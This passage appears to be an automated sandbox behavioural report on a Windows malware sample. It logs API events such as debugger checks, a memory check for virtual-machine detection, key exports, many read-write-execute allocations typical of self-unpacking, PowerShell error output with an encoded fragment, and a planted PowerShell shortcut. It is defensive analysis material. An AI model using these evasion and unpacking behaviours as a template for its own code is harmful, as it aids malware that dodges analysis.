GetComputerNameW April 18, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 18, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 18, 2023, 9:51 a.m.			0	0
IsDebuggerPresent April 18, 2023, 9:51 a.m.			0	0
IsDebuggerPresent April 18, 2023, 9:51 a.m.			0	0

Command line console output was observed (23 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: The term 'Method' is not recognized as the name of a cmdlet, function, script f console_handle: 0x0000002f	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: ile, or operable program. Check the spelling of the name, or if a path was incl console_handle: 0x0000003b	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: uded, verify that the path is correct and try again. console_handle: 0x00000047	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: At line:1 char:7 console_handle: 0x00000053	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: + Method <<<< invocation failed because [System.Security.Cryptography.AesManag console_handle: 0x0000005f	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: ed] does console_handle: 0x0000006b	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Method:String) [], CommandNotFo console_handle: 0x00000077	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: undException console_handle: 0x00000083	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000008f	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: Bad numeric constant: 5. console_handle: 0x0000040f	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: At line:7 char:2 console_handle: 0x0000041b	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: + 5 <<<< ulS93uMYYyqc51yq26WTECSSUNbdVtMq7IXadWiS1yQP1e/qDT/go/c5G1At1XYqCP1//T console_handle: 0x00000427	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: hFM4kVpW console_handle: 0x00000433	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: + CategoryInfo : ParserError: (5:String) [], ParentContainsErrorR console_handle: 0x0000043f	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: ecordException console_handle: 0x0000044b	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: + FullyQualifiedErrorId : BadNumericConstant console_handle: 0x00000457	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: Bad numeric constant: 5. console_handle: 0x000007e3	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: At line:8 char:2 console_handle: 0x000007ef	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: + 5 <<<< ulS93uMYYyqc51yq26WTECSSUNbdVtMq7IXadWiS1yQP1e/qDT/go/c5G1At1XYqCP1//T console_handle: 0x000007fb	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: hFM4kVpW console_handle: 0x00000807	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: + CategoryInfo : ParserError: (5:String) [], ParentContainsErrorR console_handle: 0x00000813	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: ecordException console_handle: 0x0000081f	1	1
WriteConsoleW April 18, 2023, 9:51 a.m.	buffer: + FullyQualifiedErrorId : BadNumericConstant console_handle: 0x0000082b	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 130 events)

Time & API	Arguments	Status	Return
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e4d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e4d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e4d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5428 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e4e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e4e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e45d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4c58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4c58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4c58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 18, 2023, 9:51 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 426 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73162000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c73000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02880000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02950000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x715c1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x715c2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02602000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02951000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02952000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02603000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02604000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02637000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02635000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02605000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02830000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02606000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02623000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02624000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02625000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02626000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02627000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02628000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02629000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02acb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02acc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02acd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ace000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02acf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 9:51 a.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (6 events)

